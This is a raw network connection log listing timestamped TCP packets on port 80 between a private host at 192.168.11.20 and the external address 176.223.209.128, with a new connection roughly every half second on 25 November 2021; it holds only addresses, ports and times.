Nov 25, 2021 10:54:36.039554119 CET	50614	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:36.072818995 CET	80	50614	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:36.072989941 CET	50614	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:36.074486971 CET	50614	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:36.107779980 CET	80	50614	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:36.107959986 CET	50614	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:36.141539097 CET	80	50614	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:36.158060074 CET	80	50614	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:36.158124924 CET	80	50614	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:36.158354044 CET	50614	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:36.158416986 CET	50614	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:36.192073107 CET	80	50614	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:36.552771091 CET	50615	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:36.586877108 CET	80	50615	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:36.587146044 CET	50615	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:36.588959932 CET	50615	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:36.622982025 CET	80	50615	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:36.623321056 CET	50615	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:36.657262087 CET	80	50615	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:36.675076008 CET	80	50615	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:36.675123930 CET	80	50615	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:36.675285101 CET	50615	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:36.675333023 CET	50615	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:36.709502935 CET	80	50615	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:37.023350954 CET	50616	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:37.057157993 CET	80	50616	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:37.057344913 CET	50616	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:37.058855057 CET	50616	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:37.092668056 CET	80	50616	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:37.092895031 CET	50616	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:37.126780033 CET	80	50616	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:37.142956018 CET	80	50616	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:37.142976999 CET	80	50616	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:37.143155098 CET	50616	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:37.143176079 CET	50616	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:37.177062035 CET	80	50616	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:37.528088093 CET	50617	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:37.561538935 CET	80	50617	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:37.561830044 CET	50617	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:37.563383102 CET	50617	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:37.596698999 CET	80	50617	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:37.596916914 CET	50617	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:37.630234003 CET	80	50617	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:37.645782948 CET	80	50617	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:37.645838976 CET	80	50617	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:37.646003962 CET	50617	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:37.646058083 CET	50617	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:37.679641008 CET	80	50617	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:37.983124971 CET	50618	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:38.016973972 CET	80	50618	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:38.017158031 CET	50618	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:38.018762112 CET	50618	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:38.053245068 CET	80	50618	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:38.053430080 CET	50618	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:38.087927103 CET	80	50618	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:38.104346037 CET	80	50618	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:38.104422092 CET	80	50618	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:38.104547024 CET	50618	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:38.104588032 CET	50618	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:38.139183044 CET	80	50618	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:38.464108944 CET	50619	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:38.497268915 CET	80	50619	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:38.497509003 CET	50619	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:38.499059916 CET	50619	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:38.532176971 CET	80	50619	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:38.532474995 CET	50619	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:38.565738916 CET	80	50619	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:38.581376076 CET	80	50619	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:38.581427097 CET	80	50619	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:38.581664085 CET	50619	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:38.581712961 CET	50619	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:38.615092039 CET	80	50619	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:38.987632990 CET	50620	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:39.021079063 CET	80	50620	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:39.021297932 CET	50620	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:39.022864103 CET	50620	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:39.056190014 CET	80	50620	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:39.056458950 CET	50620	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:39.089996099 CET	80	50620	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:39.106671095 CET	80	50620	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:39.106735945 CET	80	50620	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:39.107028008 CET	50620	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:39.107124090 CET	50620	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:39.140922070 CET	80	50620	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:39.485940933 CET	50621	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:39.520068884 CET	80	50621	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:39.520327091 CET	50621	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:39.521845102 CET	50621	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:39.555844069 CET	80	50621	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:39.556061983 CET	50621	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:39.590101957 CET	80	50621	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:39.606010914 CET	80	50621	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:39.606062889 CET	80	50621	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:39.606228113 CET	50621	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:39.606280088 CET	50621	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:39.640348911 CET	80	50621	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:39.993477106 CET	50622	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:40.027672052 CET	80	50622	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:40.027853966 CET	50622	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:40.029449940 CET	50622	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:40.063390017 CET	80	50622	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:40.063529968 CET	50622	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:40.097289085 CET	80	50622	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:40.114411116 CET	80	50622	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:40.114502907 CET	80	50622	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:40.114634037 CET	50622	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:40.114645004 CET	50622	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:40.148413897 CET	80	50622	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:40.520751953 CET	50623	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:40.554857969 CET	80	50623	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:40.555167913 CET	50623	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:40.556828022 CET	50623	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:40.590837002 CET	80	50623	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:40.591095924 CET	50623	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:40.625153065 CET	80	50623	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:40.643548012 CET	80	50623	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:40.643559933 CET	80	50623	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:40.643763065 CET	50623	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:40.643817902 CET	50623	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:40.677757978 CET	80	50623	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:41.027298927 CET	50624	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:41.061232090 CET	80	50624	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:41.061914921 CET	50624	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:41.063492060 CET	50624	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:41.097572088 CET	80	50624	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:41.097805023 CET	50624	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:41.131937027 CET	80	50624	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:41.148307085 CET	80	50624	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:41.148360014 CET	80	50624	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:41.148581028 CET	50624	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:41.148632050 CET	50624	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:41.182760000 CET	80	50624	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:41.528724909 CET	50625	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:41.562191010 CET	80	50625	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:41.562452078 CET	50625	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:41.563963890 CET	50625	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:41.597354889 CET	80	50625	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:41.597642899 CET	50625	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:41.630964994 CET	80	50625	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:41.646722078 CET	80	50625	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:41.646770954 CET	80	50625	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:41.647013903 CET	50625	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:41.647063017 CET	50625	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:41.680577993 CET	80	50625	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:42.008594036 CET	50626	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:42.042850971 CET	80	50626	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:42.043050051 CET	50626	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:42.044572115 CET	50626	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:42.078769922 CET	80	50626	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:42.079153061 CET	50626	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:42.113415956 CET	80	50626	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:42.130131006 CET	80	50626	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:42.130196095 CET	80	50626	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:42.130347013 CET	50626	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:42.130409956 CET	50626	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:42.164711952 CET	80	50626	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:42.512037039 CET	50627	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:42.545452118 CET	80	50627	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:42.545715094 CET	50627	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:42.547775984 CET	50627	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:42.581047058 CET	80	50627	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:42.581515074 CET	50627	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:42.614648104 CET	80	50627	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:42.630259991 CET	80	50627	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:42.630273104 CET	80	50627	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:42.630508900 CET	50627	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:42.630521059 CET	50627	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:42.663630962 CET	80	50627	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:42.988079071 CET	50628	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:43.021238089 CET	80	50628	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:43.021488905 CET	50628	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:43.023086071 CET	50628	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:43.056538105 CET	80	50628	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:43.056854010 CET	50628	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:43.090509892 CET	80	50628	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:43.108867884 CET	80	50628	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:43.108938932 CET	80	50628	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:43.109174967 CET	50628	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:43.109277964 CET	50628	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:43.142963886 CET	80	50628	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:43.492806911 CET	50629	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:43.526928902 CET	80	50629	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:43.527163982 CET	50629	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:43.528949976 CET	50629	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:43.562974930 CET	80	50629	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:43.563225985 CET	50629	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:43.597170115 CET	80	50629	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:43.612893105 CET	80	50629	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:43.612961054 CET	80	50629	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:43.613315105 CET	50629	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:43.613351107 CET	50629	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:43.647485018 CET	80	50629	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:43.947434902 CET	50630	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:43.980657101 CET	80	50630	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:43.980850935 CET	50630	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:43.982400894 CET	50630	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:44.015579939 CET	80	50630	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:44.015687943 CET	50630	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:44.048827887 CET	80	50630	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:44.064980984 CET	80	50630	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:44.065067053 CET	80	50630	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:44.065213919 CET	50630	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:44.065228939 CET	50630	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:44.098469019 CET	80	50630	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:44.446423054 CET	50631	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:44.480531931 CET	80	50631	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:44.480828047 CET	50631	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:44.482332945 CET	50631	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:44.516364098 CET	80	50631	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:44.516541958 CET	50631	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:44.550581932 CET	80	50631	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:44.571494102 CET	80	50631	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:44.571543932 CET	80	50631	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:44.571645975 CET	50631	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:44.571701050 CET	50631	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:44.606024027 CET	80	50631	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:44.947443008 CET	50632	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:44.981492996 CET	80	50632	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:44.981744051 CET	50632	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:44.983290911 CET	50632	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:45.017287016 CET	80	50632	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:45.017497063 CET	50632	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:45.051471949 CET	80	50632	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:45.067610979 CET	80	50632	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:45.067645073 CET	80	50632	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:45.067787886 CET	50632	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:45.067821026 CET	50632	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:45.101867914 CET	80	50632	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:45.404156923 CET	50633	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:45.437988043 CET	80	50633	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:45.438108921 CET	50633	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:45.439632893 CET	50633	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:45.473427057 CET	80	50633	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:45.473598003 CET	50633	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:45.507503986 CET	80	50633	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:45.530987024 CET	80	50633	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:45.531043053 CET	80	50633	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:45.531337023 CET	50633	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:45.531421900 CET	50633	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:45.565648079 CET	80	50633	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:45.916054010 CET	50634	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:45.950200081 CET	80	50634	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:45.950459957 CET	50634	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:45.952049017 CET	50634	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:45.986126900 CET	80	50634	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:45.986447096 CET	50634	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:46.020708084 CET	80	50634	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:46.036932945 CET	80	50634	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:46.036995888 CET	80	50634	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:46.037172079 CET	50634	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:46.037235975 CET	50634	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:46.071571112 CET	80	50634	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:46.420284033 CET	50635	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:46.453552008 CET	80	50635	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:46.453784943 CET	50635	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:46.455302000 CET	50635	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:46.488558054 CET	80	50635	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:46.488739967 CET	50635	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:46.522114992 CET	80	50635	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:46.537779093 CET	80	50635	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:46.537831068 CET	80	50635	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:46.538048983 CET	50635	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:46.538103104 CET	50635	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:46.571566105 CET	80	50635	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:46.941507101 CET	50636	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:46.975615978 CET	80	50636	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:46.975976944 CET	50636	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:46.977530956 CET	50636	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:47.011539936 CET	80	50636	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:47.012042046 CET	50636	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:47.046040058 CET	80	50636	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:47.062096119 CET	80	50636	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:47.062158108 CET	80	50636	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:47.062362909 CET	50636	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:47.062412977 CET	50636	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:47.096513033 CET	80	50636	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:47.444483995 CET	50637	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:47.478333950 CET	80	50637	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:47.478501081 CET	50637	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:47.479979038 CET	50637	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:47.513911963 CET	80	50637	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:47.514127016 CET	50637	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:47.547955990 CET	80	50637	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:47.563481092 CET	80	50637	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:47.563500881 CET	80	50637	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:47.563766003 CET	50637	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:47.563782930 CET	50637	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:47.597645044 CET	80	50637	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:47.913933992 CET	50638	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:47.947371960 CET	80	50638	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:47.947590113 CET	50638	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:47.949234962 CET	50638	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:47.982546091 CET	80	50638	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:47.982718945 CET	50638	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:48.015974045 CET	80	50638	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:48.034163952 CET	80	50638	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:48.034203053 CET	80	50638	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:48.034408092 CET	50638	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:48.067686081 CET	80	50638	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:48.424110889 CET	50639	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:48.458219051 CET	80	50639	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:48.458451986 CET	50639	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:48.460000038 CET	50639	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:48.493946075 CET	80	50639	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:48.494208097 CET	50639	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:48.528414965 CET	80	50639	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:48.546823025 CET	80	50639	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:48.546886921 CET	80	50639	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:48.547075033 CET	50639	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:48.547173023 CET	50639	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:48.581502914 CET	80	50639	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:48.945017099 CET	50640	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:48.978507042 CET	80	50640	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:48.978749037 CET	50640	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:48.980263948 CET	50640	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:49.013711929 CET	80	50640	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:49.013894081 CET	50640	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:49.047245026 CET	80	50640	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:49.063332081 CET	80	50640	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:49.063391924 CET	80	50640	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:49.063577890 CET	50640	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:49.063638926 CET	50640	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:49.097196102 CET	80	50640	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:49.455513954 CET	50641	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:49.489589930 CET	80	50641	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:49.489782095 CET	50641	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:49.491342068 CET	50641	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:49.525325060 CET	80	50641	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:49.525903940 CET	50641	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:49.559923887 CET	80	50641	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:49.577491999 CET	80	50641	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:49.577569962 CET	80	50641	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:49.577764034 CET	50641	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:49.577822924 CET	50641	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:49.611859083 CET	80	50641	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:49.973846912 CET	50642	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:50.007407904 CET	80	50642	176.223.209.128	192.168.11.20
Nov 25, 2021 10:54:50.007601976 CET	50642	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:50.009141922 CET	50642	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:54:50.042310953 CET	80	50642	176.223.209.128	192.168.11.20
